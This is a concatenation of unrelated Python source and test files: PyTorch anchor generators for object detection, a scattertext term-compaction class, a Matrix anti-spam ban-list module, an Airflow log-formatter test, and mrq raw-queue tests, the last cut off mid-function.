if isinstance(stride, (int, float)):
stride = [stride] * dim
stride_formatted = [stride[0], stride[1], stride[0], stride[1]]
if dim == 3:
stride_formatted.extend([stride[2], stride[2]])
anchors_with_stride.append(
anchors * torch.tensor(stride_formatted)[None].float())
if cat:
anchors_with_stride = torch.cat(anchors_with_stride, dim=0)
return anchors_with_stride
class AnchorGenerator2D(torch.nn.Module):
def __init__(self, sizes: Sequence[Union[int, Sequence[int]]] = (128, 256, 512),
aspect_ratios: Sequence[Union[float, Sequence[float]]] = (0.5, 1.0, 2.0),
**kwargs):
"""
Generator for anchors
Modified from https://github.com/pytorch/vision/blob/master/torchvision/models/detection/rpn.py
Args:
sizes (Sequence[Union[int, Sequence[int]]]): anchor sizes for each feature map
(length should match the number of feature maps)
aspect_ratios (Sequence[Union[float, Sequence[float]]]): anchor aspect ratios:
height/width, e.g. (0.5, 1, 2). if Seq[Seq] is provided, it should have
the same length as sizes
"""
super().__init__()
if not isinstance(sizes[0], (list, tuple)):
sizes = tuple((s,) for s in sizes)
if not isinstance(aspect_ratios[0], (list, tuple)):
aspect_ratios = (aspect_ratios,) * len(sizes)
assert len(sizes) == len(aspect_ratios)
self.sizes = sizes
self.aspect_ratios = aspect_ratios
self.cell_anchors = None
self._cache = {}
self.num_anchors_per_level: List[int] = None
if kwargs:
logger.info(f"Discarding anchor generator kwargs {kwargs}")
def cached_grid_anchors(self, grid_sizes: List[List[int]], strides: List[List[int]]) -> List[torch.Tensor]:
"""
Check if combination was already generated before and return that if possible
Args:
grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps
strides (Sequence[Sequence[int]]): stride of each feature map
Returns:
List[torch.Tensor]: Anchors for each feature maps
"""
key = str(grid_sizes + strides)
if key not in self._cache:
self._cache[key] = self.grid_anchors(grid_sizes, strides)
self.num_anchors_per_level = self._cache[key][1]
return self._cache[key][0]
def grid_anchors(self, grid_sizes, strides) -> Tuple[List[torch.Tensor], List[int]]:
"""
Distribute anchors over feature maps
Args:
grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps
strides (Sequence[Sequence[int]]): stride of each feature map
Returns:
List[torch.Tensor]: Anchors for each feature maps
List[int]: number of anchors per level
"""
assert len(grid_sizes) == len(strides), "Every fm size needs strides"
assert len(grid_sizes) == len(self.cell_anchors), "Every fm size needs cell anchors"
anchors = []
cell_anchors = self.cell_anchors
assert cell_anchors is not None
_i = 0
# modified from torchvision (ordering of axis differs)
anchor_per_level = []
for size, stride, base_anchors in zip(grid_sizes, strides, cell_anchors):
size0, size1 = size
stride0, stride1 = stride
device = base_anchors.device
shifts_x = torch.arange(0, size0, dtype=torch.float, device=device) * stride0
shifts_y = torch.arange(0, size1, dtype=torch.float, device=device) * stride1
shift_y, shift_x = torch.meshgrid(shifts_y, shifts_x)
shift_x = shift_x.reshape(-1)
shift_y = shift_y.reshape(-1)
shifts = torch.stack((shift_x, shift_y, shift_x, shift_y), dim=1)
_anchors = (shifts.view(-1, 1, 4) + base_anchors.view(1, -1, 4)).reshape(-1, 4)
anchors.append(_anchors)
anchor_per_level.append(_anchors.shape[0])
logger.debug(f"Generated {anchors[_i].shape[0]} anchors and expected "
f"{size0 * size1 * self.num_anchors_per_location()[_i]} "
f"anchors on level {_i}.")
_i += 1
return anchors, anchor_per_level
@staticmethod
def generate_anchors(scales: Tuple[int],
aspect_ratios: Tuple[float],
dtype: torch.dtype = torch.float,
device: Union[torch.device, str] = "cpu",
) -> torch.Tensor:
"""
Generate anchors for a pair of scales and ratios
Args:
scales (Tuple[int]): scales of anchors, e.g. (32, 64, 128)
aspect_ratios (Tuple[float]): aspect ratios of height/width, e.g. (0.5, 1, 2)
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
Tensor: anchors of shape [n(scales) * n(ratios), dim * 2]
"""
scales = torch.as_tensor(scales, dtype=dtype, device=device)
aspect_ratios = torch.as_tensor(aspect_ratios, dtype=dtype, device=device)
h_ratios = torch.sqrt(aspect_ratios)
w_ratios = 1 / h_ratios
ws = (w_ratios[:, None] * scales[None, :]).view(-1)
hs = (h_ratios[:, None] * scales[None, :]).view(-1)
base_anchors = torch.stack([-ws, -hs, ws, hs], dim=1) / 2
return base_anchors.round()
def set_cell_anchors(self, dtype: torch.dtype, device: Union[torch.device, str] = "cpu") -> None:
"""
        Set :param:`self.cell_anchors` if it was not already set
Args:
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
None
result is saved into attribute
"""
if self.cell_anchors is not None:
return
cell_anchors = [self.generate_anchors(sizes, aspect_ratios, dtype, device)
for sizes, aspect_ratios in zip(self.sizes, self.aspect_ratios)]
self.cell_anchors = cell_anchors
def forward(self, image_list: torch.Tensor, feature_maps: List[torch.Tensor]) -> List[torch.Tensor]:
"""
Generate anchors for given feature maps
# TODO: update docstring and type
Args:
image_list (torch.Tensor): data structure which contains images and their original shapes
feature_maps (Sequence[torch.Tensor]): feature maps for which anchors need to be generated
Returns:
List[Tensor]: list of anchors (for each image inside the batch)
"""
device = image_list.device
grid_sizes = list([feature_map.shape[2:] for feature_map in feature_maps])
image_size = image_list.shape[2:]
strides = [list((int(i / s) for i, s in zip(image_size, fm_size))) for fm_size in grid_sizes]
self.set_cell_anchors(dtype=feature_maps[0].dtype, device=feature_maps[0].device)
anchors_over_all_feature_maps = self.cached_grid_anchors(grid_sizes, strides)
anchors = []
images_shapes = [img.shape for img in image_list.split(1)]
for i, x in enumerate(images_shapes):
anchors_in_image = []
for anchors_per_feature_map in anchors_over_all_feature_maps:
anchors_in_image.append(anchors_per_feature_map)
anchors.append(anchors_in_image)
anchors = [torch.cat(anchors_per_image).to(device) for anchors_per_image in anchors]
# TODO: check with torchvision if this makes sense (if enabled, anchors are newly generated for each run)
# # Clear the cache in case that memory leaks.
# self._cache.clear()
return anchors
def num_anchors_per_location(self) -> List[int]:
"""
Number of anchors per resolution
Returns:
List[int]: number of anchors per positions for each resolution
"""
return [len(s) * len(a) for s, a in zip(self.sizes, self.aspect_ratios)]
def get_num_acnhors_per_level(self) -> List[int]:
"""
Number of anchors per resolution
Returns:
List[int]: number of anchors per positions for each resolution
"""
if self.num_anchors_per_level is None:
raise RuntimeError("Need to forward features maps before "
"get_num_acnhors_per_level can be called")
return self.num_anchors_per_level
class AnchorGenerator3D(AnchorGenerator2D):
def __init__(self,
sizes: Sequence[Union[int, Sequence[int]]] = (128, 256, 512),
aspect_ratios: Sequence[Union[float, Sequence[float]]] = (0.5, 1.0, 2.0),
zsizes: Sequence[Union[int, Sequence[int]]] = (4, 4, 4),
**kwargs):
"""
Helper to generate anchors for different input sizes
Args:
sizes (Sequence[Union[int, Sequence[int]]]): anchor sizes for each feature map
(length should match the number of feature maps)
aspect_ratios (Sequence[Union[float, Sequence[float]]]): anchor aspect ratios:
height/width, e.g. (0.5, 1, 2). if Seq[Seq] is provided, it should have
the same length as sizes
zsizes (Sequence[Union[int, Sequence[int]]]): sizes along z dimension
"""
super().__init__(sizes, aspect_ratios)
if not isinstance(zsizes[0], (Sequence, list, tuple)):
zsizes = (zsizes,) * len(sizes)
self.zsizes = zsizes
if kwargs:
logger.info(f"Discarding anchor generator kwargs {kwargs}")
def set_cell_anchors(self, dtype: torch.dtype, device: Union[torch.device, str] = "cpu") -> None:
"""
        Compute anchors for all pairs of scales and ratios and save them inside :param:`cell_anchors`
if they were not computed before
Args:
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
None (result is saved into :param:`self.cell_anchors`)
"""
if self.cell_anchors is not None:
return
cell_anchors = [
self.generate_anchors(sizes, aspect_ratios, zsizes, dtype, device)
for sizes, aspect_ratios, zsizes in zip(self.sizes, self.aspect_ratios, self.zsizes)
]
self.cell_anchors = cell_anchors
@staticmethod
def generate_anchors(scales: Tuple[int], aspect_ratios: Tuple[float], zsizes: Tuple[int],
dtype: torch.dtype = torch.float,
device: Union[torch.device, str] = "cpu") -> torch.Tensor:
"""
Generate anchors for a pair of scales and ratios
Args:
scales (Tuple[int]): scales of anchors, e.g. (32, 64, 128)
aspect_ratios (Tuple[float]): aspect ratios of height/width, e.g. (0.5, 1, 2)
zsizes (Tuple[int]): scale along z dimension
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
Tensor: anchors of shape [n(scales) * n(ratios) * n(zscales) , dim * 2]
"""
base_anchors_2d = AnchorGenerator2D.generate_anchors(
scales, aspect_ratios, dtype=dtype, device=device)
zanchors = torch.cat(
[torch.as_tensor([-z, z], dtype=dtype, device=device).repeat(
base_anchors_2d.shape[0], 1) for z in zsizes], dim=0)
base_anchors_3d = torch.cat(
[base_anchors_2d.repeat(len(zsizes), 1), (zanchors / 2.).round()], dim=1)
return base_anchors_3d
def grid_anchors(self, grid_sizes: Sequence[Sequence[int]],
strides: Sequence[Sequence[int]]) -> Tuple[List[torch.Tensor], List[int]]:
"""
Distribute anchors over feature maps
Args:
grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps
strides (Sequence[Sequence[int]]): stride of each feature map
Returns:
List[torch.Tensor]: Anchors for each feature maps
List[int]: number of anchors per level
"""
assert len(grid_sizes) == len(strides)
assert len(grid_sizes) == len(self.cell_anchors)
anchors = []
_i = 0
anchor_per_level = []
for size, stride, base_anchors in zip(grid_sizes, strides, self.cell_anchors):
size0, size1, size2 = size
stride0, stride1, stride2 = stride
dtype, device = base_anchors.dtype, base_anchors.device
shifts_x = torch.arange(0, size0, dtype=dtype, device=device) * stride0
shifts_y = torch.arange(0, size1, dtype=dtype, device=device) * stride1
shifts_z = torch.arange(0, size2, dtype=dtype, device=device) * stride2
shift_x, shift_y, shift_z = torch.meshgrid(shifts_x, shifts_y, shifts_z)
shift_x = shift_x.reshape(-1)
shift_y = shift_y.reshape(-1)
shift_z = shift_z.reshape(-1)
shifts = torch.stack((shift_x, shift_y, shift_x, shift_y, shift_z, shift_z), dim=1)
_anchors = (shifts.view(-1, 1, 6) + base_anchors.view(1, -1, 6)).reshape(-1, 6)
anchors.append(_anchors)
anchor_per_level.append(_anchors.shape[0])
logger.debug(f"Generated {_anchors.shape[0]} anchors and expected "
f"{size0 * size1 * size2 * self.num_anchors_per_location()[_i]} "
f"anchors on level {_i}.")
_i += 1
return anchors, anchor_per_level
def num_anchors_per_location(self) -> List[int]:
"""
Number of anchors per resolution
Returns:
List[int]: number of anchors per positions for each resolution
"""
return [len(s) * len(a) * len(z) for s, a, z in zip(self.sizes, self.aspect_ratios, self.zsizes)]
class AnchorGenerator2DS(AnchorGenerator2D):
def __init__(self,
width: Sequence[Union[int, Sequence[int]]],
height: Sequence[Union[int, Sequence[int]]],
**kwargs,
):
"""
Helper to generate anchors for different input sizes
Uses a different parametrization of anchors
(if Sequence[int] is provided it is interpreted as one
value per feature map size)
Args:
width: sizes along width dimension
height: sizes along height dimension
"""
# TODO: check width and height statements
super().__init__()
if not isinstance(width[0], Sequence):
width = [(w,) for w in width]
if not isinstance(height[0], Sequence):
height = [(h,) for h in height]
self.width = width
self.height = height
assert len(self.width) == len(self.height)
if kwargs:
logger.info(f"Discarding anchor generator kwargs {kwargs}")
def set_cell_anchors(self, dtype: torch.dtype,
device: Union[torch.device, str] = "cpu") -> None:
"""
        Compute anchors for all pairs of scales and ratios and
save them inside :param:`cell_anchors`
if they were not computed before
Args:
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
None (result is saved into :param:`self.cell_anchors`)
"""
if self.cell_anchors is not None:
return
cell_anchors = [
self.generate_anchors(w, h, dtype, device)
for w, h in zip(self.width, self.height)
]
self.cell_anchors = cell_anchors
@staticmethod
def generate_anchors(width: Tuple[int],
height: Tuple[int],
dtype: torch.dtype = torch.float,
device: Union[torch.device, str] = "cpu",
) -> torch.Tensor:
"""
Generate anchors for given width, height and depth sizes
Args:
width: sizes along width dimension
height: sizes along height dimension
Returns:
Tensor: anchors of shape [n(width) * n(height), dim * 2]
"""
all_sizes = torch.tensor(list(product(width, height)),
dtype=dtype, device=device) / 2
anchors = torch.stack([-all_sizes[:, 0], -all_sizes[:, 1],
all_sizes[:, 0], all_sizes[:, 1]], dim=1)
return anchors
def num_anchors_per_location(self) -> List[int]:
"""
Number of anchors per resolution
Returns:
List[int]: number of anchors per positions for each resolution
"""
return [len(w) * len(h) for w, h in zip(self.width, self.height)]
class AnchorGenerator3DS(AnchorGenerator3D):
def __init__(self,
width: Sequence[Union[int, Sequence[int]]],
height: Sequence[Union[int, Sequence[int]]],
depth: Sequence[Union[int, Sequence[int]]],
**kwargs,
):
"""
Helper to generate anchors for different input sizes
Uses a different parametrization of anchors
(if Sequence[int] is provided it is interpreted as one
value per feature map size)
Args:
width: sizes along width dimension
height: sizes along height dimension
depth: sizes along depth dimension
"""
# TODO: check width and height statements
super().__init__()
if not isinstance(width[0], Sequence):
width = [(w,) for w in width]
if not isinstance(height[0], Sequence):
height = [(h,) for h in height]
if not isinstance(depth[0], Sequence):
depth = [(d,) for d in depth]
self.width = width
self.height = height
self.depth = depth
assert len(self.width) == len(self.height) == len(self.depth)
if kwargs:
logger.info(f"Discarding anchor generator kwargs {kwargs}")
def set_cell_anchors(self, dtype: torch.dtype, device: Union[torch.device, str] = "cpu") -> None:
"""
Compute anchors for all pairs of scales and ratios and save them inside :param:`cell_anchors`
if they were not computed before
Args:
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
None (result is saved into :param:`self.cell_anchors`)
"""
if self.cell_anchors is not None:
return
cell_anchors = [
self.generate_anchors(w, h, d, dtype, device)
for w, h, d in zip(self.width, self.height, self.depth)
]
self.cell_anchors = cell_anchors
@staticmethod
def generate_anchors(width: Tuple[int],
height: Tuple[int],
depth: Tuple[int],
dtype: torch.dtype = torch.float,
device: Union[torch.device, str] = "cpu") -> torch.Tensor:
"""
Generate anchors for given width, height and depth sizes
Args:
width: sizes along width dimension
height: sizes along height dimension
depth: sizes along depth dimension
Returns:
Tensor: anchors of shape [n(width) * n(height) * n(depth) , dim * 2]
"""
all_sizes = torch.tensor(list(product(width, height, depth)),
dtype=dtype, device=device) / 2
anchors = torch.stack(
[-all_sizes[:, 0], -all_sizes[:, 1], all_sizes[:, 0], all_sizes[:, 1],
-all_sizes[:, 2], all_sizes[:, 2]], dim=1
)
return anchors
def num_anchors_per_location(self) -> List[int]:
"""
Number of anchors per resolution
Returns:
List[int]: number of anchors per positions for each resolution
"""
return [len(w) * len(h) * len(d)
for w, h, d in zip(self.width, self.height, self.depth)]
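# --- Illustrative usage sketch (not part of the original nnDetection module) ---
# The widths/heights and strides below are made-up example values; the sketch only
# shows how the size-parametrized 2D generator and the stride helper fit together.
if __name__ == "__main__":
    base_anchors = AnchorGenerator2DS.generate_anchors(width=(16, 32), height=(16, 32))
    print(base_anchors.shape)  # torch.Size([4, 4]): one anchor per (width, height) pair
    anchor_pyramid = compute_anchors_for_strides(base_anchors, strides=[2, 4], cat=True)
    print(anchor_pyramid.shape)  # torch.Size([12, 4]): base anchors plus two scaled copies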
|
scattertext/termcompaction/ClassPercentageCompactor.py | shettyprithvi/scattertext | 1,823 | 12770384 | <reponame>shettyprithvi/scattertext
import numpy as np
from scattertext.termranking import AbsoluteFrequencyRanker
class ClassPercentageCompactor(object):
def __init__(self,
term_ranker=AbsoluteFrequencyRanker,
term_count=2):
'''
Limit terms to ones that make up a minimum percentage
of documents in a category. Given a term_count, set the threshold
to that of the smallest class.
Parameters
----------
term_ranker : TermRanker
term_count : int
'''
self.term_ranker = term_ranker
self.term_count = term_count
def compact(self, term_doc_matrix, non_text=False):
'''
Parameters
-------
term_doc_matrix : TermDocMatrix
non_text : bool
        Returns
-------
New term doc matrix
'''
ranker = self.term_ranker(term_doc_matrix)
if non_text:
ranker = ranker.use_non_text_features()
tdf = ranker.get_ranks()
tdf_sum = tdf.sum(axis=0)
tdf_portions = tdf / tdf_sum
threshold = np.max(self.term_count / tdf_sum)
terms_to_remove = tdf_portions[~(tdf_portions > threshold).any(axis=1)].index
return term_doc_matrix.remove_terms(terms_to_remove, non_text=non_text)
|
synapse_antispam/mjolnir/antispam.py | grahamc/mjolnir | 153 | 12770404 | # -*- coding: utf-8 -*-
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from .list_rule import ALL_RULE_TYPES, RECOMMENDATION_BAN
from .ban_list import BanList
from synapse.types import UserID
logger = logging.getLogger("synapse.contrib." + __name__)
class AntiSpam(object):
def __init__(self, config, api):
self.block_invites = config.get("block_invites", True)
self.block_messages = config.get("block_messages", False)
self.block_usernames = config.get("block_usernames", False)
self.list_room_ids = config.get("ban_lists", [])
self.rooms_to_lists = {} # type: Dict[str, BanList]
self.api = api
# Now we build the ban lists so we can match them
self.build_lists()
def build_lists(self):
for room_id in self.list_room_ids:
self.build_list(room_id)
def build_list(self, room_id):
logger.info("Rebuilding ban list for %s" % (room_id))
self.get_list_for_room(room_id).build()
def get_list_for_room(self, room_id):
if room_id not in self.rooms_to_lists:
self.rooms_to_lists[room_id] = BanList(api=self.api, room_id=room_id)
return self.rooms_to_lists[room_id]
def is_user_banned(self, user_id):
for room_id in self.rooms_to_lists:
ban_list = self.rooms_to_lists[room_id]
for rule in ban_list.user_rules:
if rule.matches(user_id):
return rule.action == RECOMMENDATION_BAN
return False
def is_room_banned(self, invite_room_id):
for room_id in self.rooms_to_lists:
ban_list = self.rooms_to_lists[room_id]
for rule in ban_list.room_rules:
if rule.matches(invite_room_id):
return rule.action == RECOMMENDATION_BAN
return False
def is_server_banned(self, server_name):
for room_id in self.rooms_to_lists:
ban_list = self.rooms_to_lists[room_id]
for rule in ban_list.server_rules:
if rule.matches(server_name):
return rule.action == RECOMMENDATION_BAN
return False
# --- spam checker interface below here ---
def check_event_for_spam(self, event):
room_id = event.get("room_id", "")
event_type = event.get("type", "")
state_key = event.get("state_key", None)
# Rebuild the rules if there's an event for our ban lists
if state_key is not None and event_type in ALL_RULE_TYPES and room_id in self.list_room_ids:
logger.info("Received ban list event - updating list")
self.get_list_for_room(room_id).build(with_event=event)
return False # Ban list updates aren't spam
if not self.block_messages:
return False # not spam (we aren't blocking messages)
sender = UserID.from_string(event.get("sender", ""))
if self.is_user_banned(sender.to_string()):
return True
if self.is_server_banned(sender.domain):
return True
return False # not spam (as far as we're concerned)
def user_may_invite(self, inviter_user_id, invitee_user_id, room_id):
if not self.block_invites:
return True # allowed (we aren't blocking invites)
sender = UserID.from_string(inviter_user_id)
if self.is_user_banned(sender.to_string()):
return False
if self.is_room_banned(room_id):
return False
if self.is_server_banned(sender.domain):
return False
return True # allowed (as far as we're concerned)
def check_username_for_spam(self, user_profile):
if not self.block_usernames:
return True # allowed (we aren't blocking based on usernames)
# Check whether the user ID or display name matches any of the banned
# patterns.
return self.is_user_banned(user_profile["user_id"]) or self.is_user_banned(user_profile["display_name"])
def user_may_create_room(self, user_id):
return True # allowed
def user_may_create_room_alias(self, user_id, room_alias):
return True # allowed
def user_may_publish_room(self, user_id, room_id):
return True # allowed
@staticmethod
def parse_config(config):
return config # no parsing needed
|
tests/utils/test_task_handler_with_custom_formatter.py | npodewitz/airflow | 8,092 | 12770417 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import pytest
from airflow.config_templates.airflow_local_settings import DEFAULT_LOGGING_CONFIG
from airflow.models import DAG, TaskInstance
from airflow.operators.empty import EmptyOperator
from airflow.utils.log.logging_mixin import set_context
from airflow.utils.state import DagRunState
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_runs
DEFAULT_DATE = datetime(2019, 1, 1)
TASK_HANDLER = 'task'
TASK_HANDLER_CLASS = 'airflow.utils.log.task_handler_with_custom_formatter.TaskHandlerWithCustomFormatter'
PREV_TASK_HANDLER = DEFAULT_LOGGING_CONFIG['handlers']['task']
DAG_ID = "task_handler_with_custom_formatter_dag"
TASK_ID = "task_handler_with_custom_formatter_task"
@pytest.fixture(scope="module", autouse=True)
def custom_task_log_handler_config():
DEFAULT_LOGGING_CONFIG['handlers']['task'] = {
'class': TASK_HANDLER_CLASS,
'formatter': 'airflow',
'stream': 'sys.stdout',
}
logging.config.dictConfig(DEFAULT_LOGGING_CONFIG)
logging.root.disabled = False
yield
DEFAULT_LOGGING_CONFIG['handlers']['task'] = PREV_TASK_HANDLER
logging.config.dictConfig(DEFAULT_LOGGING_CONFIG)
@pytest.fixture()
def task_instance():
dag = DAG(DAG_ID, start_date=DEFAULT_DATE)
task = EmptyOperator(task_id=TASK_ID, dag=dag)
dagrun = dag.create_dagrun(DagRunState.RUNNING, execution_date=DEFAULT_DATE, run_type=DagRunType.MANUAL)
ti = TaskInstance(task=task, run_id=dagrun.run_id)
ti.log.disabled = False
yield ti
clear_db_runs()
def assert_prefix(task_instance: TaskInstance, prefix: str) -> None:
handler = next((h for h in task_instance.log.handlers if h.name == TASK_HANDLER), None)
assert handler is not None, "custom task log handler not set up correctly"
assert handler.formatter is not None, "custom task log formatter not set up correctly"
expected_format = f"{prefix}:{handler.formatter._fmt}"
set_context(task_instance.log, task_instance)
assert expected_format == handler.formatter._fmt
def test_custom_formatter_default_format(task_instance):
"""The default format provides no prefix."""
assert_prefix(task_instance, "")
@conf_vars({("logging", "task_log_prefix_template"): "{{ti.dag_id }}-{{ ti.task_id }}"})
def test_custom_formatter_custom_format_not_affected_by_config(task_instance):
assert_prefix(task_instance, f"{DAG_ID}-{TASK_ID}")
|
tests/test_raw.py | fredstro/mrq | 745 | 12770434 | from mrq.job import Job
import datetime
from mrq.queue import Queue
import time
import pytest
@pytest.mark.parametrize(["p_queue", "p_pushback", "p_timed", "p_flags"], [
["test_timed_set", False, True, "--greenlets 10"],
["pushback_timed_set", True, True, "--greenlets 10"],
["test_sorted_set", False, False, "--greenlets 1"]
])
def test_raw_sorted(worker, p_queue, p_pushback, p_timed, p_flags):
worker.start(flags="%s --config tests/fixtures/config-raw1.py" %
p_flags, queues=p_queue)
test_collection = worker.mongodb_logs.tests_inserts
jobs_collection = worker.mongodb_jobs.mrq_jobs
current_time = int(time.time())
assert jobs_collection.count() == 0
assert Queue(p_queue).size() == 0
# Schedule one in the past, one in the future
worker.send_raw_tasks(p_queue, {
"aaa": current_time - 10,
"bbb": current_time + 5,
"ccc": current_time + 10
}, block=False)
# Re-schedule
worker.send_raw_tasks(p_queue, {
"ccc": current_time + 6
}, block=False)
time.sleep(3)
if not p_timed:
assert Queue(p_queue).size() == 0
assert test_collection.count() == 3
assert list(test_collection.find(projection={"params": 1, "_id": 0}).limit(1)) == [
{"params": {"sorted_set": "aaa"}}
]
return
if p_pushback:
assert Queue(p_queue).size() == 3
assert set(Queue(p_queue).list_raw_jobs()) == set([b"bbb", b"ccc", b"aaa"])
else:
assert Queue(p_queue).size() == 2
assert set(Queue(p_queue).list_raw_jobs()) == set([b"bbb", b"ccc"])
# The second one should not yet even exist in mrq_jobs
assert jobs_collection.count() == 1
assert list(jobs_collection.find())[0]["status"] == "success"
assert list(test_collection.find(projection={"params": 1, "_id": 0})) == [
{"params": {"timed_set": "aaa"}}
]
# Then wait for the second job to be done
time.sleep(5)
if p_pushback:
assert Queue(p_queue).size() == 3
else:
assert Queue(p_queue).size() == 0
assert jobs_collection.count() == 3
assert list(jobs_collection.find())[1]["status"] == "success"
assert list(jobs_collection.find())[2]["status"] == "success"
assert list(jobs_collection.find())[2]["worker"]
assert test_collection.count() == 3
@pytest.mark.parametrize("has_subqueue", [False, True])
@pytest.mark.parametrize(["p_queue", "p_set"], [
["test_raw", False],
["test_set", True]
])
def test_raw_set(worker, has_subqueue, p_queue, p_set):
flags = "--greenlets 10 --config tests/fixtures/config-raw1.py"
if has_subqueue:
flags = "%s --subqueues_refresh_interval=0.1" % flags
# worker should dequeue all subqueues
p_queue = "%s/" % p_queue
worker.start(flags=flags, queues=p_queue)
if has_subqueue:
# queue tasks in p_queue/subqueue
p_queue = "%ssubqueue" % p_queue
test_collection = worker.mongodb_logs.tests_inserts
jobs_collection = worker.mongodb_jobs.mrq_jobs
assert jobs_collection.count() == 0
assert Queue(p_queue).size() == 0
worker.send_raw_tasks(p_queue, ["aaa", "bbb", "ccc", "bbb"], block=True)
assert Queue(p_queue).size() == 0
if p_set:
assert jobs_collection.count() == 3
assert jobs_collection.count({"status": "success"}) == 3
assert test_collection.count() == 3
else:
assert jobs_collection.count() == 4
assert jobs_collection.count({"status": "success"}) == 4
assert test_collection.count() == 4
def test_raw_started(worker):
worker.start(
flags="--greenlets 2 --config tests/fixtures/config-raw1.py", queues="teststarted_raw teststartedx")
worker.send_raw_tasks("teststarted_raw", ["f1", "f2", "f3"], block=False)
time.sleep(2)
jobs_collection = worker.mongodb_jobs.mrq_jobs
assert jobs_collection.find({"status": "started", "queue": "teststartedx"}).count() == 2
assert jobs_collection.count() == 2
worker.mongodb_jobs.tests_flags.insert({"flag": "f1"})
time.sleep(1)
assert jobs_collection.find({"status": "success", "queue": "teststartedx"}).count() == 1
assert jobs_collection.find({"status": "started", "queue": "teststartedx"}).count() == 2
assert jobs_collection.count() == 3
worker.mongodb_jobs.tests_flags.insert({"flag": "f2"})
worker.mongodb_jobs.tests_flags.insert({"flag": "f3"})
time.sleep(1)
worker.stop(block=True, deps=False)
assert jobs_collection.find({"status": "success", "queue": "teststartedx"}).count() == 3
assert jobs_collection.count() == 3
worker.stop_deps()
@pytest.mark.parametrize(["p_queue"], [
["test_raw"],
["test_set"],
["test_timed_set"]
])
def test_raw_remove(worker, p_queue):
worker.start_deps()
worker.send_raw_tasks(
p_queue, ["aa", "bb", "cc"], block=False, start=False)
assert Queue(p_queue).size() == 3
Queue(p_queue).remove_raw_jobs(["aa", "cc"])
assert Queue(p_queue).size() == 1
worker.stop_deps()
def test_raw_exception(worker):
p_queue = "testexception_raw"
worker.start(
flags="--greenlets 10 --config tests/fixtures/config-raw1.py", queues=p_queue)
jobs_collection = worker.mongodb_jobs.mrq_jobs
assert jobs_collection.count() == 0
assert Queue(p_queue).size() == 0
worker.send_raw_tasks(p_queue, ["msg1"], block=True)
failjob = list(jobs_collection.find())[0]
assert Queue("default").size() == 0
assert Queue(p_queue).size() == 0
assert jobs_collection.count() == 1
assert failjob["status"] == "failed"
worker.stop(deps=False)
worker.start(
deps=False, flags="--greenlets 10 --config tests/fixtures/config-raw1.py", queues="default")
worker.send_task(
"mrq.basetasks.utils.JobAction",
{
"id": failjob["_id"],
"action": "requeue"
},
block=True
)
assert Queue("default").size() == 0
assert Queue(p_queue).size() == 0
assert jobs_collection.count() == 2
assert list(jobs_collection.find({"_id": failjob["_id"]}))[
0]["status"] == "queued"
assert list(jobs_collection.find({"_id": {"$ne": failjob["_id"]}}))[
0]["status"] == "success"
worker.stop(deps=False)
worker.start(
deps=False, flags="--greenlets 10 --config tests/fixtures/config-raw1.py", queues="default testx")
worker.wait_for_idle()
assert Queue(p_queue).size() == 0
assert jobs_collection.count() == 2
assert Queue("testx").size() == 0
assert list(jobs_collection.find({"_id": failjob["_id"]}))[
0]["status"] == "failed"
def test_raw_retry(worker):
p_queue = "testretry_raw"
worker.start(
flags="--greenlets 10 --config tests/fixtures/config-raw1.py", queues=p_queue)
jobs_collection = worker.mongodb_jobs.mrq_jobs
assert jobs_collection.count() == 0
assert Queue(p_queue).size() == 0
worker.send_raw_tasks(p_queue, [0], block=True)
failjob = list(jobs_collection.find())[0]
assert Queue("default").size() == 0
assert Queue("testx").size() == 1
assert Queue(p_queue).size() == 0
assert jobs_collection.count() == 1
assert failjob["status"] == "queued"
assert failjob["queue"] == "testx"
@pytest.mark.parametrize(["p_queue", "p_greenlets"], [x1 + x2 for x1 in [
["test_raw default test"],
# ["default test_raw test"],
# ["default test_raw test_set"],
# ["test_set test_raw default"],
# ["test test2 test_set test_raw default"]
] for x2 in [
# [1],
[2],
# [10]
]])
def test_raw_mixed(worker, p_queue, p_greenlets):
worker.start_deps()
worker.send_raw_tasks(
"test_raw", ["aaa", "bbb", "ccc"], start=False, block=False)
worker.send_task("tests.tasks.general.MongoInsert", {
"not_raw": "ddd"
}, start=False, block=False)
assert Queue("test_raw").size() == 3
assert Queue("default").size() == 1
worker.start(flags="--greenlets %s --config tests/fixtures/config-raw1.py" %
p_greenlets, queues=p_queue, deps=False)
test_collection = worker.mongodb_logs.tests_inserts
jobs_collection = worker.mongodb_jobs.mrq_jobs
time.sleep(3)
assert Queue("test_raw").size() == 0
assert Queue("default").size() == 0
assert test_collection.count() == 4
assert jobs_collection.count() == 4
assert jobs_collection.find({"status": "success"}).count() == 4
assert list(jobs_collection.find({"status": "success"}))[0]["worker"]
def test_raw_no_storage(worker):
""" Test tasks that don't store unless they go to error status like 'failed' """
worker.start(
flags="--config tests/fixtures/config-raw1.py",
queues="default testnostorage_raw"
)
jobs_collection = worker.mongodb_jobs.mrq_jobs
